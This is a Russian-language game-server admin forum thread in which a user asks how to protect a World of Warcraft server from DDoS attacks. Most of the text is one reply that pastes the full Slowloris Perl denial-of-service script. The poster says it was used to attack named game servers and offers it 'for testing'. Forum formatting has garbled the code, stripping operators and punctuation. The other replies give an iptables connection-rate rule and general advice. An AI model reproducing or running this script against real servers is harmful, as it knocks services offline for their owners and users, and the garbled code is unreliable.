Ддос атаки - Форум администраторов игровых серверов
Форум администраторов игровых серверов StormWall - Защита от DDos атак
Регистрация Мнения Справка Пользователи Календарь Все разделы прочитаны
Вернуться   Форум администраторов игровых серверов > MMO > Другие игры / Other games > World of WarCraft

World of WarCraft
В этом форуме мы обсуждаем вопросы установки и настройки сервера онлайн игры World of WarCraft.

Ответ
Опции темы
Непрочитано 10.01.2010, 21:47   #1
Пользователь

Автор темы (Топик Стартер) Ддос атаки

Какой программой можно защититься от ддос атак и как её настроить?
Arsenn вне форума Ответить с цитированием
Непрочитано 10.01.2010, 22:02   #2
Аватар для Navvy
Супергерой

По умолчанию Re: Ддос атаки

От DDoS ни одна программа не спасет. Нужна "зелезная" защита. От DoS может спасти грамотная настройка фаервола. Кури мануалы.
Navvy вне форума Отправить сообщение для Navvy с помощью ICQ Ответить с цитированием
Непрочитано 10.01.2010, 22:54   #3
Изгнанные

По умолчанию Re: Ддос атаки

Цитата:
Сообщение от Navvy Посмотреть сообщение
От DDoS ни одна программа не спасет. Нужна "зелезная" защита. От DoS может спасти грамотная настройка фаервола. Кури мануалы.
Я не знаю как можно назвать эти штуки... ну короче назовём СКРИПТАМИ!!!
Так вот, эти скрипты ставяться в каталог с сайтом, и правельным образом настраиваються... и родключаються к сайту!!!
Ramzessuss вне форума Отправить сообщение для Ramzessuss с помощью ICQ Ответить с цитированием
Непрочитано 11.01.2010, 00:48   #4
Изгнанные

По умолчанию Re: Ддос атаки

Цитата:
Сообщение от Arsenn Посмотреть сообщение
Какой программой можно защититься от ддос атак и как её настроить?
iptables прошла проверку на многих порталах, серверах, сайтах

Вот пример скрипта, написанный на perl, им ддосили Asterios, l2alpha.net и много всяких серверов и проект L2Open! ддосят с помощью пакетов. Не нужно экспериментировать, это может плохо для вас закончиться.

Скрипт выложен для тестирования на ваших серверах.

PHP код:
#!/usr/bin/perl -w
use strict;
use 
IO::Socket::INET;
#use IO::Socket::SSL;
use Getopt::Long;
use 
Config;

$SIG{'PIPE'} = 'IGNORE';    #Ignore broken pipe errors

print <<EOTEXT;
[
1m
CCCCCCCCCCOOCCOOOOO888
\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
ooooCCOO8O888888888
\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88
\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88
\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8
\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8
\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8
\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8
\@8\@8Ooc:.:...cOO8O88c.      .  .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888
\@8\@88888888Oo:. .  ...cO888Oc..          :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888
\@88888888888Oo:.       .O8888C:  .oCOo.  ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo
. .o8Oo. .cO88Oo:       :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8
\@88OO8O888Oo:::... ..  :cO8Oc. . .....  :.  .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::..  ....  ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:...  ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
 
..... ............. .coocoooCCoco:::ccccccc:::ccc::..........  ....:::cc::::coC
   
.  . ...    .... ..  .:cccoCooc:..  ::cccc:::c:.. ......... ......::::c:cccco
  
.  .. ... ..    .. ..   ..:...:cooc::cccccc:.....  .........  .....:::::ccoocc
       
.   .         .. ..::cccc:.::ccoocc:. ........... ..  . ..:::.:::::::ccco
[31m
 Welcome to Slowloris 
the low bandwidthyet greedy and poisonous HTTP client
[m
EOTEXT

my 
$host$port$sendhost$shost$test$version$timeout$connections );
my $cache$httpready$method$ssl$rand$tcpto );
my $result GetOptions(
    
'shost=s'   => \$shost,
    
'dns=s'     => \$host,
    
'httpready' => \$httpready,
    
'num=i'     => \$connections,
    
'cache'     => \$cache,
    
'port=i'    => \$port,
    
'https'     => \$ssl,
    
'tcpto=i'   => \$tcpto,
    
'test'      => \$test,
    
'timeout=i' => \$timeout,
    
'version'   => \$version,
);

if (
$version) {
    print 
"Version 0.7\n";
    exit;
}

unless ($host) {
    print 
"Usage:\n\n\tperl $0 -dns [[url]www.example.com][/url] -options\n";
    print 
"\n\tType 'perldoc $0' for help with options.\n\n";
    exit;
}

unless ($port) {
    
$port 80;
    print 
"Defaulting to port 80.\n";
}

unless ($tcpto) {
    
$tcpto 5;
    print 
"Defaulting to a 5 second tcp connection timeout.\n";
}

unless ($test) {
    
unless ($timeout) {
        
$timeout 100;
        print 
"Defaulting to a 100 second re-try timeout.\n";
    }
    
unless ($connections) {
        
$connections 1000;
        print 
"Defaulting to 1000 connections.\n";
    }
}

my $usemultithreading 0;
if ( 
$Config{usethreads} ) {
    print 
"Multithreading enabled.\n";
    
$usemultithreading 1;
    use 
threads;
    use 
threads::shared;
}
else {
    print 
"No multithreading capabilites found!\n";
    print 
"Slowloris will be slower than normal as a result.\n";
}

my $packetcount shared     0;
my $failed shared          0;
my $connectioncount shared 0;

srand() if ($cache);

if (
$shost) {
    
$sendhost $shost;
}
else {
    
$sendhost $host;
}
if (
$httpready) {
    
$method "POST";
}
else {
    
$method "GET";
}

if (
$test) {
    
my @times = ( "2""30""90""240""500" );
    
my $totaltime 0;
    foreach (@
times) {
        
$totaltime $totaltime $_;
    }
    
$totaltime $totaltime 60;
    print 
"This test could take up to $totaltime minutes.\n";

    
my $delay   0;
    
my $working 0;
    
my $sock;

    if (
$ssl) {
        if (
            
$sock = new IO::Socket::SSL(
                
PeerAddr => "$host",
                
PeerPort => "$port",
                
Timeout  => "$tcpto",
                
Proto    => "tcp",
            )
          )
        {
            
$working 1;
        }
    }
    else {
        if (
            
$sock = new IO::Socket::INET(
                
PeerAddr => "$host",
                
PeerPort => "$port",
                
Timeout  => "$tcpto",
                
Proto    => "tcp",
            )
          )
        {
            
$working 1;
        }
    }
    if (
$working) {
        if (
$cache) {
            
$rand "?" intrand(99999999999999) );
        }
        else {
            
$rand "";
        }
        
my $primarypayload =
            
"GET /$rand HTTP/1.1\r\n"
          
"Host: $sendhost\r\n"
          
"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
          
"Content-Length: 42\r\n";
        if ( print 
$sock $primarypayload ) {
            print 
"Connection successful, now comes the waiting game...\n";
        }
        else {
            print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
            print 
"Is something wrong?\nDying.\n";
            exit;
        }
    }
    else {
        print 
"Uhm... I can't connect to $host:$port.\n";
        print 
"Is something wrong?\nDying.\n";
        exit;
    }
    for ( 
my $i $i <= $#times ; $i++ ) {
        
print "Trying a $times[$i] second delay: \n";
        
sleep$times[$i] );
        if ( print 
$sock "X-a: b\r\n" ) {
            print 
"\tWorked.\n";
            
$delay $times[$i];
        }
        else {
            if ( 
$SIG{__WARN__} ) {
                
$delay $times$i ];
                
last;
            }
            print 
"\tFailed after $times[$i] seconds.\n";
        }
    }

    if ( print 
$sock "Connection: Close\r\n\r\n" ) {
        print 
"Okay that's enough time. Slowloris closed the socket.\n";
        print 
"Use $delay seconds for -timeout.\n";
        exit;
    }
    else {
        print 
"Remote server closed socket.\n";
        print 
"Use $delay seconds for -timeout.\n";
        exit;
    }
    if ( 
$delay 166 ) {
        print <<
EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally 
takes between 200
-500 threads for most servers and assuming any latency at 
all
...  you might have trouble using Slowloris against this target.  You can 
tweak the 
-timeout flag down to less than 10 seconds but it still may not 
build the sockets in time
.
EOSUCKS2BU
    
}
}
else {
    print
"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";

    if (
$usemultithreading) {
        
domultithreading($connections);
    }
    else {
        
doconnections$connections$usemultithreading );
    }
}

sub doconnections {
    
my $num$usemultithreading ) = @_;
    
my ( @first, @sock, @working );
    
my $failedconnections 0;
    
$working[$_] = foreach ( .. $num );    #initializing
    
$first[$_]   = foreach ( .. $num );    #initializing
    
while (1) {
        
$failedconnections 0;
        print 
"\t\tBuilding sockets.\n";
        foreach 
my $z .. $num ) {
            if ( 
$working[$z] == ) {
                if (
$ssl) {
                    if (
                        
$sock[$z] = new IO::Socket::SSL(
                            
PeerAddr => "$host",
                            
PeerPort => "$port",
                            
Timeout  => "$tcpto",
                            
Proto    => "tcp",
                        )
                      )
                    {
                        
$working[$z] = 1;
                    }
                    else {
                        
$working[$z] = 0;
                    }
                }
                else {
                    if (
                        
$sock[$z] = new IO::Socket::INET(
                            
PeerAddr => "$host",
                            
PeerPort => "$port",
                            
Timeout  => "$tcpto",
                            
Proto    => "tcp",
                        )
                      )
                    {
                        
$working[$z] = 1;
                        
$packetcount $packetcount 3;  #SYN, SYN+ACK, ACK
                    
}
                    else {
                        
$working[$z] = 0;
                    }
                }
                if ( 
$working[$z] == ) {
                    if (
$cache) {
                        
$rand "?" intrand(99999999999999) );
                    }
                    else {
                        
$rand "";
                    }
                    
my $primarypayload =
                        
"$method /$rand HTTP/1.1\r\n"
                      
"Host: $sendhost\r\n"
                      
"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
                      
"Content-Length: 42\r\n";
                    
my $handle $sock[$z];
                    if (
$handle) {
                        print 
$handle "$primarypayload";
                        if ( 
$SIG{__WARN__} ) {
                            
$working[$z] = 0;
                            
close $handle;
                            
$failed++;
                            
$failedconnections++;
                        }
                        else {
                            
$packetcount++;
                            
$working[$z] = 1;
                        }
                    }
                    else {
                        
$working[$z] = 0;
                        
$failed++;
                        
$failedconnections++;
                    }
                }
                else {
                    
$working[$z] = 0;
                    
$failed++;
                    
$failedconnections++;
                }
            }
        }
        print 
"\t\tSending data.\n";
        foreach 
my $z .. $num ) {
            if ( 
$working[$z] == ) {
                if ( 
$sock[$z] ) {
                    
my $handle $sock[$z];
                    if ( print 
$handle "X-a: b\r\n" ) {
                        
$working[$z] = 1;
                        
$packetcount++;
                    }
                    else {
                        
$working[$z] = 0;
                        
#debugging info
                        
$failed++;
                        
$failedconnections++;
                    }
                }
                else {
                    
$working[$z] = 0;
                    
#debugging info
                    
$failed++;
                    
$failedconnections++;
                }
            }
        }
        print
"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
        
sleep($timeout);
    }
}

sub domultithreading {
    
my ($num) = @_;
    
my @thrs;
    
my $i                    0;
    
my $connectionsperthread 50;
    while ( 
$i $num ) {
        
$thrs[$i] =
          
threads->create( \&doconnections$connectionsperthread);
        
$i += $connectionsperthread;
    }
    
my @threadslist threads->list();
    while ( $
#threadslist > 0 ) {
        
$failed 0;
    }

GoodShadow вне форума Отправить сообщение для GoodShadow с помощью ICQ Отправить сообщение для GoodShadow с помощью Skype™ Ответить с цитированием
Непрочитано 11.01.2010, 17:16   #5
Пользователь

Автор темы (Топик Стартер) Re: Ддос атаки

Цитата:
Сообщение от Navvy Посмотреть сообщение
От DDoS ни одна программа не спасет. Нужна "зелезная" защита. От DoS может спасти грамотная настройка фаервола. Кури мануалы.
читал я уже мануалы, да вот чет не помогает особо.

GoodShadow, не совсем понятно что вы пытались сказать, все что я понял - нужно качать программу ptables
Arsenn вне форума Ответить с цитированием
Непрочитано 11.01.2010, 18:53   #6
Аватар для Navvy
Супергерой

По умолчанию Re: Ддос атаки

iptables - это линуксовый фаервол.

Вот простой пример защиты от DoS атаки, не путай с DDoS, это разные вещи.

Цепочка правил для iptables

Цитата:
# если новое соединение на 80 порт на внешнем интерфейсе идем в цепочку LIMIT
-A INPUT -p tcp -m tcp -m state -i eth0 --dport 80 --state NEW -j LIMIT
# Если соединений меньше 10/сек пропускаем
-A LIMIT -m limit --limit 10/second -j ACCEPT
# иначе отбрасываем
-A LIMIT -j DROP
Если у тебя винда, ищи альтернативу. Что там нынче на виндовые серваки ставят, не знаю, давно уже пересел на Linux и радуюсь жизни.
Navvy вне форума Отправить сообщение для Navvy с помощью ICQ Ответить с цитированием
Непрочитано 11.01.2010, 23:49   #7
Изгнанные

По умолчанию Re: Ддос атаки

Цитата:
Сообщение от Navvy Посмотреть сообщение
iptables - это линуксовый фаервол.

Вот простой пример защиты от DoS атаки, не путай с DDoS, это разные вещи.

Цепочка правил для iptables



Если у тебя винда, ищи альтернативу. Что там нынче на виндовые серваки ставят, не знаю, давно уже пересел на Linux и радуюсь жизни.
Ты забыл про пакеты и ограничения подключений к порту с 1 ip, речь идёт о сервере а не про веб обвязку
GoodShadow вне форума Отправить сообщение для GoodShadow с помощью ICQ Отправить сообщение для GoodShadow с помощью Skype™ Ответить с цитированием
Непрочитано 12.01.2010, 00:08   #8
Пользователь

Автор темы (Топик Стартер) Re: Ддос атаки

я вот хочу перейти на линукс, тогда сразу несколько вопросво
1. Сервер wow под линукс так же ставить как и под винду? и пойдет ли вообще?
2. Линукс хоть как то защищает от ддос атак? я слышал что куда сложнее атаковать сервер если стоит не винда, а линукс.
3. 2х ядерный процессор оперативка 4 гига. Сколько выдержит онлайн комп если будет стоять винда хр и сколько выдержит онлайн если будет стоять линукс?
Arsenn вне форума Ответить с цитированием
Непрочитано 12.01.2010, 00:18   #9
Изгнанные

По умолчанию Re: Ддос атаки

Цитата:
Сообщение от Arsenn Посмотреть сообщение
я вот хочу перейти на линукс, тогда сразу несколько вопросов.
1. Сервер wow под линукс так же ставить как и под винду? и пойдет ли вообще?
2. Линукс хоть как то защищает от ддос атак? я слышал что куда сложнее атаковать сервер если стоит не винда, а линукс.
3. 2х ядерный процессор оперативка 4 гига. Сколько выдержит онлайн комп если будет стоять винда хр и сколько выдержит онлайн если будет стоять линукс?
1) тут под wine (виндус эмулятором устанавливается сервере WoW тоже то и Windows, тока Windows будет проще поставить и стабильности линукса ты от такого сервера не получишь. По тому что это приложение вин запущено под лин....
2) хорошо настроенный iptables самая хорошая защита от ДДоса и прочих не желательных проблем.
3) Во основном зависит от интернет канала, в среднем 1 пользователь потребляет 54кбита/sec ну на 4 ГБ можно 500 человек без лагов потянуть (1) нужен стабильный сервер, 2) нужен хороший интернет канал, быстрые ХДшники)
GoodShadow вне форума Отправить сообщение для GoodShadow с помощью ICQ Отправить сообщение для GoodShadow с помощью Skype™ Ответить с цитированием
Сказали спасибо:
Непрочитано 15.01.2010, 21:51   #10
Аватар для Itachi
Учиха

По умолчанию Re: Ддос атаки

единственное что реал может защитить от ДДОС это норм настроеные шлюзы у провайдера! и то на факт!
Itachi вне форума Отправить сообщение для Itachi с помощью ICQ Отправить сообщение для Itachi с помощью Skype™ Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


© 2007–2024 «Форум администраторов игровых серверов»
Защита сайта от DDoS атак — StormWall
Работает на Булке неизвестной версии с переводом от zCarot
Текущее время: 13:54. Часовой пояс GMT +3.

Вверх